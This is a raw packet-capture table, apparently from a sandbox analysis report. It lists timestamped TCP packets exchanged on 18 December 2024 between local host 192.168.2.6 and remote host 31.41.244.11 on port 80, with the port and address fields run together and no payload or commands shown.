                                                                                                                                                              Dec 18, 2024 11:47:14.465653896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.471376896 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.471391916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.471451044 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.471487045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.471765995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.471818924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.471857071 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.471900940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.473768950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.473823071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.473869085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.473922968 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.475519896 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.475573063 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.475621939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.475667953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.477456093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.477478981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.477523088 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.477561951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.479243040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.479309082 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.479351997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.479391098 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.481123924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.481175900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.481193066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.481230974 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.483007908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.483068943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.483124018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.483171940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.484852076 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.484905005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.484971046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.485012054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.486763954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.486824036 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.486857891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.486908913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.488589048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.488657951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.488687992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.488739967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.490443945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.490502119 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.490549088 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.490598917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.492309093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.492367029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.492393970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.492436886 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.494244099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.494256020 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.494308949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.496115923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.496159077 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.496202946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.496253014 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.497878075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.497931004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.497971058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.498014927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.499794006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.499844074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.499960899 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.500009060 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.501605988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.501672983 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.501719952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.501771927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.503447056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.503504992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.503547907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.503592014 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.505314112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.505359888 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.505369902 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.505410910 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.507184029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.507236004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.507297039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.507725954 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.509079933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.509140968 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.509202003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.509255886 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.510988951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.511028051 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.511049032 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.511082888 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.610620022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.610681057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.610726118 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.610749006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.611517906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.611572981 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.611577034 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.611619949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.613349915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.613447905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.615744114 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.615803003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.615830898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.615858078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.616600037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.616648912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.616686106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.616724014 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.618349075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.618396997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.618443012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.618486881 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.620043039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.620057106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.620100021 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.621701956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.621753931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.621793985 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.621835947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.623344898 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.623394966 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.623418093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.623461008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.624929905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.624979019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.625000954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.625036001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.626517057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.626566887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.626632929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.626672983 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.628076077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.628135920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.628171921 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.628215075 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.629666090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.629713058 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.629750967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.629786015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.631170988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.631184101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.631222963 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.632632971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.632683992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.632721901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.632765055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.634188890 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.634247065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.634377956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.634417057 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.635678053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.635785103 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.635804892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.635823011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.637079000 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.637135029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.637209892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.637250900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.638474941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.638534069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.638572931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.638612032 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.639955044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.640017033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.640094042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.640144110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.641458988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.641472101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.641509056 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.643156052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.643167973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.643214941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.644406080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.644462109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.644601107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.644644022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.645881891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.645901918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.645960093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.647238970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.647280931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.647299051 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.647326946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.648772001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.648832083 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.648868084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.648905039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.650216103 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.650233984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.650254965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.650295019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.651737928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.651782990 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.651807070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.651840925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.653085947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.653132915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.653204918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.653244972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.654552937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.654683113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.654709101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.654742002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.656033039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.656096935 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.656128883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.656167030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.657481909 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.657517910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.657541037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.657576084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.659003019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.659019947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.659044027 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.659080029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.660371065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.660417080 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.660475016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.660509109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.661849022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.661900043 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.662015915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.662060022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.663367033 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.663383007 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.663444996 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.663465023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.664764881 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.664814949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.664814949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.664860010 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.666282892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.666363001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.666416883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.666461945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.667697906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.667752981 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.667821884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.667862892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.669147015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.669210911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.669249058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.669287920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.670674086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.670722961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.670730114 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.670767069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.672094107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.672116041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.672135115 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.672173977 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.673504114 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.673552990 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.673608065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.674097061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.674968958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.675029039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.675036907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.675076962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.676533937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.676548958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.676580906 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.676604033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.677911043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.677969933 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.678435087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.678487062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.679380894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.679424047 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.679491043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.679528952 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.680829048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.680896044 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.680937052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.680989027 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.682285070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.682344913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.682378054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.682424068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.683815002 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.683871031 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.683938980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.683984995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.685275078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.685287952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.685338020 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.686650038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.686705112 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.802387953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.802465916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.802484989 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.802514076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.803133965 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.803185940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.803209066 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.803229094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.804449081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.804516077 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.804539919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.804575920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.805563927 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.805624008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.806983948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.807029963 CET804980631.41.244.11192.168.2.6
